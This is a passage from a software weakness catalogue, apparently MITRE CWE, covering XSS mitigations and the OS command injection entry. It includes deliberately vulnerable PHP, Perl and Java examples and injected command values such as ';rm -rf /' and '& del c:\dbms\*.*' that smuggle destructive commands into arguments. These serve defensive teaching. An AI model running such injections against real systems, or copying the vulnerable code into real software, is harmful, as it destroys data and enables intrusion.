If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

Phase: Implementation

Strategy: Output Encoding

Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.

The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
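
As a minimal, hedged illustration of this mitigation, the servlet sketch below (the class and markup are illustrative, assuming the standard javax.servlet API) declares the output encoding explicitly so that the browser never has to guess:

(Good Code)
Example Language: Java 
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Illustrative servlet: pin the response charset before writing any output,
// so downstream components and browsers do not infer a different encoding.
public class WelcomeServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws IOException {
        response.setContentType("text/html; charset=UTF-8");
        response.setCharacterEncoding("UTF-8");
        PrintWriter out = response.getWriter();
        out.println("<html><body>Welcome</body></html>");
    }
}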

Phase: Implementation

With Struts, write all data from form beans with the bean's filter attribute set to true.

Phase: Implementation

Strategy: Identify and Reduce Attack Surface

To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

Effectiveness: Defense in Depth
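
A minimal sketch of this mitigation, assuming the Servlet 3.0+ javax.servlet.http.Cookie API (the cookie name and helper class are illustrative):

(Good Code)
Example Language: Java 
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletResponse;

// Illustrative helper: mark the session cookie HttpOnly (and Secure) so that
// scripts reading document.cookie cannot obtain it in browsers that honor the flag.
public final class SessionCookieHelper {
    public static void addSessionCookie(HttpServletResponse response, String sessionId) {
        Cookie cookie = new Cookie("SESSIONID", sessionId); // illustrative cookie name
        cookie.setHttpOnly(true);  // requires Servlet 3.0 or later
        cookie.setSecure(true);    // only send the cookie over HTTPS
        cookie.setPath("/");
        response.addCookie(cookie);
    }
}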

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When dynamically constructing web pages, use stringent whitelists that limit the character set based on the expected value of the parameter in the request. All input should be validated and cleansed, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. It is common to see data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.

Note that proper output encoding, escaping, and quoting is the most effective solution for preventing XSS, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent XSS, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, in a chat application, the heart emoticon ("<3") would likely pass the validation step, since it is commonly used. However, it cannot be directly inserted into the web page because it contains the "<" character, which would need to be escaped or otherwise handled. In this case, stripping the "<" might reduce the risk of XSS, but it would produce incorrect behavior because the emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities.

Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.

Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
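
The following sketch shows whitelist validation at a well-defined interface; the character class and length limit are illustrative assumptions and would need to match the application's actual specification:

(Good Code)
Example Language: Java 
import java.util.regex.Pattern;

// Illustrative whitelist validator: accept only inputs that strictly conform
// to the expected specification and reject everything else.
public final class UsernameValidator {
    // Assumption for illustration: usernames are 1-32 ASCII letters, digits, or underscores.
    private static final Pattern USERNAME = Pattern.compile("^[A-Za-z0-9_]{1,32}$");

    public static String requireValidUsername(String input) {
        if (input == null || !USERNAME.matcher(input).matches()) {
            throw new IllegalArgumentException("invalid username");
        }
        return input;
    }
}

Even with this check in place, the value should still be output-encoded when it is written into a page, as described above.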

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
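
A minimal sketch of this strategy, mapping fixed numeric IDs to known resources; the map contents and class name are illustrative (Map.of requires Java 9 or later):

(Good Code)
Example Language: Java 
import java.util.Map;

// Illustrative indirection: clients submit a numeric ID and never a filename or URL.
public final class ReportCatalog {
    private static final Map<Integer, String> REPORTS = Map.of(
            1, "summary.html",   // illustrative entries
            2, "detail.html");

    public static String resolve(int reportId) {
        String file = REPORTS.get(reportId);
        if (file == null) {
            throw new IllegalArgumentException("unknown report id");
        }
        return file;
    }
}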

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

+ Background Details

Same Origin Policy

The same origin policy states that browsers should limit the resources accessible to scripts running on a given web site, or "origin", to the resources associated with that web site on the client-side, and not the client-side resources of any other sites or "origins". The goal is to prevent one site from being able to modify or read the contents of an unrelated site. Since the World Wide Web involves interactions between many sites, this policy is important for browsers to enforce.

Domain

The Domain of a website when referring to XSS is roughly equivalent to the resources associated with that website on the client-side of the connection. That is, the domain can be thought of as all resources the browser is storing for the user's interactions with this particular site.

+ Weakness Ordinalities
Ordinality | Description
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
Nature | Type | ID | Name | View(s) this relationship pertains to | Named Chain(s) this relationship pertains to
ChildOf | Weakness Class | 74 | Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
  Weaknesses for Simplified Mapping of Published Vulnerabilities (primary) 1003
ChildOf | Category | 442 | Web Problems
  Development Concepts 699
ChildOf | Category | 712 | OWASP Top Ten 2007 Category A1 - Cross Site Scripting (XSS)
  Weaknesses in OWASP Top Ten (2007) (primary) 629
ChildOf | Category | 722 | OWASP Top Ten 2004 Category A1 - Unvalidated Input
  Weaknesses in OWASP Top Ten (2004) 711
ChildOf | Category | 725 | OWASP Top Ten 2004 Category A4 - Cross-Site Scripting (XSS) Flaws
  Weaknesses in OWASP Top Ten (2004) (primary) 711
ChildOf | Category | 751 | 2009 Top 25 - Insecure Interaction Between Components
  Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary) 750
ChildOf | Category | 801 | 2010 Top 25 - Insecure Interaction Between Components
  Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary) 800
ChildOf | Category | 811 | OWASP Top Ten 2010 Category A2 - Cross-Site Scripting (XSS)
  Weaknesses in OWASP Top Ten (2010) (primary) 809
ChildOf | Category | 864 | 2011 Top 25 - Insecure Interaction Between Components
  Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary) 900
ChildOf | Category | 931 | OWASP Top Ten 2013 Category A3 - Cross-Site Scripting (XSS)
  Weaknesses in OWASP Top Ten (2013) (primary) 928
ChildOf | Category | 990 | SFP Secondary Cluster: Tainted Input to Command
  Software Fault Pattern (SFP) Clusters (primary) 888
ChildOf | Category | 1005 | Input Validation and Representation
  Seven Pernicious Kingdoms (primary) 700
CanPrecede | Weakness Base | 494 | Download of Code Without Integrity Check
  Research Concepts 1000
PeerOf | Compound Element: Composite | 352 | Cross-Site Request Forgery (CSRF)
  Research Concepts 1000
ParentOf | Weakness Variant | 80 | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
ParentOf | Weakness Variant | 81 | Improper Neutralization of Script in an Error Message Web Page
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
ParentOf | Weakness Variant | 83 | Improper Neutralization of Script in Attributes in a Web Page
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
ParentOf | Weakness Variant | 84 | Improper Neutralization of Encoded URI Schemes in a Web Page
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
ParentOf | Weakness Variant | 85 | Doubled Character XSS Manipulations
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
ParentOf | Weakness Variant | 86 | Improper Neutralization of Invalid Characters in Identifiers in Web Pages
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
ParentOf | Weakness Variant | 87 | Improper Neutralization of Alternate XSS Syntax
  Development Concepts (primary) 699
  Research Concepts (primary) 1000
MemberOf | View | 635 | Weaknesses Used by NVD
  Weaknesses Used by NVD (primary) 635
MemberOf | View | 884 | CWE Cross-section
  CWE Cross-section (primary) 884
CanFollow | Weakness Base | 113 | Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
  Research Concepts 1000
CanFollow | Weakness Base | 184 | Incomplete Blacklist
  Research Concepts 1000
  Named Chain: Incomplete Blacklist to Cross-Site Scripting (692)
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
PLOVER | | | Cross-site scripting (XSS)
7 Pernicious Kingdoms | | | Cross-site Scripting
CLASP | | | Cross-site scripting
OWASP Top Ten 2007 | A1 | Exact | Cross Site Scripting (XSS)
OWASP Top Ten 2004 | A1 | CWE More Specific | Unvalidated Input
OWASP Top Ten 2004 | A4 | Exact | Cross-Site Scripting (XSS) Flaws
WASC | 8 | | Cross-site Scripting
Software Fault Patterns | SFP24 | | Tainted input to command
+ References
[R.79.1] [REF-15] Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager and Seth Fogie. "XSS Attacks". Syngress. 2007.
[R.79.2] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 31. McGraw-Hill. 2010.
[R.79.3] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 3: Web-Client Related Vulnerabilities (XSS)." Page 63. McGraw-Hill. 2010.
[R.79.4] "Cross-site scripting". Wikipedia. 2008-08-26. <http://en.wikipedia.org/wiki/Cross-site_scripting>.
[R.79.5] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 13, "Web-Specific Input Issues", Page 413. 2nd Edition. Microsoft. 2002.
[R.79.6] [REF-14] RSnake. "XSS (Cross Site Scripting) Cheat Sheet". <http://ha.ckers.org/xss.html>.
[R.79.7] Microsoft. "Mitigating Cross-site Scripting With HTTP-only Cookies". <http://msdn.microsoft.com/en-us/library/ms533046.aspx>.
[R.79.8] Mark Curphey, Microsoft. "Anti-XSS 3.0 Beta and CAT.NET Community Technology Preview now Live!". <http://blogs.msdn.com/cisg/archive/2008/12/15/anti-xss-3-0-beta-and-cat-net-community-technology-preview-now-live.aspx>.
[R.79.9] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
[R.79.10] Ivan Ristic. "XSS Defense HOWTO". <http://blog.modsecurity.org/2008/07/do-you-know-how.html>.
[R.79.11] OWASP. "Web Application Firewall". <http://www.owasp.org/index.php/Web_Application_Firewall>.
[R.79.12] Web Application Security Consortium. "Web Application Firewall Evaluation Criteria". <http://www.webappsec.org/projects/wafec/v1/wasc-wafec-v1.0.html>.
[R.79.13] RSnake. "Firefox Implements httpOnly And is Vulnerable to XMLHTTPRequest". 2007-07-19.
[R.79.14] "XMLHttpRequest allows reading HTTPOnly cookies". Mozilla. <https://bugzilla.mozilla.org/show_bug.cgi?id=380418>.
[R.79.15] "Apache Wicket". <http://wicket.apache.org/>.
[R.79.16] [REF-16] OWASP. "XSS (Cross Site Scripting) Prevention Cheat Sheet". <http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet>.
[R.79.17] [REF-20] OWASP. "DOM based XSS Prevention Cheat Sheet". <http://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet>.
[R.79.18] Jason Lam. "Top 25 series - Rank 1 - Cross Site Scripting". SANS Software Security Institute. 2010-02-22. <http://blogs.sans.org/appsecstreetfighter/2010/02/22/top-25-series-rank-1-cross-site-scripting/>.
[R.79.19] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 17, "Cross Site Scripting", Page 1071. 1st Edition. Addison Wesley. 2006.
+ Content History
Submissions
Submission Date | Submitter | Organization | Source
PLOVER | Externally Mined
Modifications
Modification Date | Modifier | Organization | Source
2008-07-01 | Eric Dalci | Cigital | External
updated Time_of_Introduction
2008-08-15 | Veracode | External
Suggested OWASP Top Ten 2004 mapping
2008-09-08 | CWE Content Team | MITRE | Internal
updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities
2009-01-12 | CWE Content Team | MITRE | Internal
updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships
2009-03-10 | CWE Content Team | MITRE | Internal
updated Potential_Mitigations
2009-05-27 | CWE Content Team | MITRE | Internal
updated Name
2009-07-27 | CWE Content Team | MITRE | Internal
updated Description
2009-10-29 | CWE Content Team | MITRE | Internal
updated Observed_Examples, Relationships
2009-12-28 | CWE Content Team | MITRE | Internal
updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples
2010-02-16 | CWE Content Team | MITRE | Internal
updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2010-04-05 | CWE Content Team | MITRE | Internal
updated Description, Potential_Mitigations, Related_Attack_Patterns
2010-06-21 | CWE Content Team | MITRE | Internal
updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships
2010-09-27 | CWE Content Team | MITRE | Internal
updated Potential_Mitigations
2011-03-29 | CWE Content Team | MITRE | Internal
updated Demonstrative_Examples, References
2011-06-01 | CWE Content Team | MITRE | Internal
updated Common_Consequences
2011-06-27 | CWE Content Team | MITRE | Internal
updated Relationships
2011-09-13 | CWE Content Team | MITRE | Internal
updated Detection_Factors, Potential_Mitigations
2012-05-11 | CWE Content Team | MITRE | Internal
updated References, Relationships
2012-10-30 | CWE Content Team | MITRE | Internal
updated Potential_Mitigations
2013-07-17 | CWE Content Team | MITRE | Internal
updated Relationships
2014-07-30 | CWE Content Team | MITRE | Internal
updated Relationships, Taxonomy_Mappings
2015-12-07 | CWE Content Team | MITRE | Internal
updated Relationships
2017-01-19 | CWE Content Team | MITRE | Internal
updated Related_Attack_Patterns
2017-05-03 | CWE Content Team | MITRE | Internal
updated Related_Attack_Patterns, Relationships
Previous Entry Names
Change Date | Previous Entry Name
2008-04-11 | Cross-site Scripting (XSS)
2009-01-12 | Failure to Sanitize Directives in a Web Page (aka 'Cross-site scripting' (XSS))
2009-05-27 | Failure to Preserve Web Page Structure (aka 'Cross-site Scripting')
2010-06-21 | Failure to Preserve Web Page Structure ('Cross-site Scripting')

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Weakness ID: 78
Abstraction: Base
Status: Draft
+ Description

Description Summary

The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Extended Description

This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increase the amount of damage.

There are at least two subtypes of OS command injection:

  1. The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system("nslookup [HOSTNAME]") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing.

  2. The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use "exec([COMMAND])" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line.

From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input.

+ Alternate Terms
Shell injection
Shell metacharacters
+ Terminology Notes

The "OS command injection" phrase carries different meanings to different people. For some people, it only refers to cases in which the attacker injects command separators into arguments for an application-controlled program that is being invoked. For some people, it refers to any type of attack that can allow the attacker to execute OS commands of their own choosing. This usage could include untrusted search path weaknesses (CWE-426) that cause the application to find and execute an attacker-controlled program. Further complicating the issue is the case when argument injection (CWE-88) allows alternate command-line switches or options to be inserted into the command line, such as an "-exec" switch whose purpose may be to execute the subsequent argument as a command (this -exec switch exists in the UNIX "find" command, for example). In this latter case, however, CWE-88 could be regarded as the primary weakness in a chain with CWE-78.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
Scope | Effect
Confidentiality
Integrity
Availability
Non-Repudiation

Technical Impact: Execute unauthorized code or commands; DoS: crash / exit / restart; Read files or directories; Modify files or directories; Read application data; Modify application data; Hide activities

Attackers could execute unauthorized commands, which could then be used to disable the software, or read and modify data that the attacker does not have permission to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application's owner.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.

Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis.

This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Effectiveness: Moderate

Manual Static Analysis

Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.

Effectiveness: High

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection.

(Bad Code)
Example Language: PHP 
$userName = $_POST["user"];
$command = 'ls -l /home/' . $userName;
system($command);

The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as:

(Attack)
 
;rm -rf /

Which would result in $command being:

(Result)
 
ls -l /home/;rm -rf /

Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system.

Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks.

Example 2

This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection.

(Bad Code)
Example Language: Perl 
use CGI qw(:standard);
$name = param('name');
$nslookup = "/path/to/nslookup";
print header;
if (open($fh, "$nslookup $name|")) {
while (<$fh>) {
print escapeHTML($_);
print "<br>\n";
}
close($fh);
}

Suppose an attacker provides a domain name like this:

(Attack)
 
cwe.mitre.org%20%3B%20/bin/ls%20-l

The "%3B" sequence decodes to the ";" character, and the %20 decodes to a space. The open() statement would then process a string like this:

(Result)
 
/path/to/nslookup cwe.mitre.org ; /bin/ls -l

As a result, the attacker executes the "/bin/ls -l" command and gets a list of all the files in the program's working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server.

Example 3

The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection.

(Bad Code)
Example Language: Java 
String script = System.getProperty("SCRIPTNAME");
if (script != null)
Runtime.getRuntime().exec(script);

If an attacker has control over this property, then they could modify the property to point to a dangerous program.

Example 4

In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through an HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates.

(Bad Code)
Example Language: Java 
public String coordinateTransformLatLonToUTM(String coordinates)
{
String utmCoords = null;
try {
String latlonCoords = coordinates;
Runtime rt = Runtime.getRuntime();
Process exec = rt.exec("cmd.exe /C latlon2utm.exe -" + latlonCoords);
// process results of coordinate transform
// ...
}
catch(Exception e) {...}
return utmCoords;
}

However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending '&' followed by the command for another program to the end of the coordinate string. The '&' instructs the Windows operating system to execute another program.

Example 5

The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.

(Bad Code)
Example Language: Java 
...
String btype = request.getParameter("backuptype");
String cmd = new String("cmd.exe /K \"
c:\\util\\rmanDB.bat "
+btype+
"&&c:\\utl\\cleanup.bat\"")
System.Runtime.getRuntime().exec(cmd);
...

The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well.
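
One hedged way to harden this example, sketched below, is to accept only known backup types and to start each batch file separately instead of chaining commands through a single cmd.exe string; the allowed values are illustrative assumptions. Because batch files are still interpreted by the Windows command processor, the strict whitelist is the essential control here.

(Good Code)
Example Language: Java 
import java.io.IOException;
import java.util.Set;

// Illustrative hardening: reject unexpected backup types and avoid building
// one shell command line from user input.
public final class BackupRunner {
    // Assumption for illustration: only these backup types exist.
    private static final Set<String> ALLOWED = Set.of("full", "incremental");

    public static void runBackup(String btype) throws IOException, InterruptedException {
        if (!ALLOWED.contains(btype)) {
            throw new IllegalArgumentException("unsupported backup type");
        }
        // Arguments are passed as separate list elements, not concatenated into one string.
        new ProcessBuilder("c:\\util\\rmanDB.bat", btype).inheritIO().start().waitFor();
        new ProcessBuilder("c:\\utl\\cleanup.bat").inheritIO().start().waitFor();
    }
}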

+ Observed Examples
Reference | Description
Canonical example. CGI program does not neutralize "|" metacharacter when invoking a phonebook program.
Language interpreter's mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.
Web server allows command execution using "|" (pipe) character.
FTP client does not filter "|" from filenames returned by the server, allowing for OS command injection.
Shell metacharacters in a filename in a ZIP archive
Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link.
OS command injection through environment variable.
OS command injection through https:// URLs
Chain: incomplete blacklist for OS command injection
Product allows remote users to execute arbitrary commands by creating a file whose pathname contains shell metacharacters.
+ Potential Mitigations

Phase: Architecture and Design

If at all possible, use library calls rather than external processes to recreate the desired functionality.
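
A hedged sketch of this idea for the directory-listing scenario from Example 1: list the directory with standard library calls so that no shell is ever involved (the path handling shown is illustrative):

(Good Code)
Example Language: Java 
import java.io.IOException;
import java.nio.file.DirectoryStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

// Illustrative replacement for system("ls -l /home/" + userName):
// the listing is produced by library calls instead of an external process.
public final class HomeDirLister {
    public static void listHome(String userName) throws IOException {
        // Resolve and confirm the result is still under /home (simple path traversal guard).
        Path home = Paths.get("/home").resolve(userName).normalize();
        if (!home.startsWith("/home")) {
            throw new IllegalArgumentException("invalid user name");
        }
        try (DirectoryStream<Path> entries = Files.newDirectoryStream(home)) {
            for (Path entry : entries) {
                System.out.println(entry.getFileName());
            }
        }
    }
}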

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Phase: Architecture and Design

Strategy: Identify and Reduce Attack Surface

For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session's state instead of sending it out to the client in a hidden form field.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, consider using the ESAPI Encoding control [R.78.8] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.

Phase: Implementation

Strategy: Output Encoding

While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict whitelist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).

Phase: Implementation

If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line.

Phase: Architecture and Design

Strategy: Parameterization

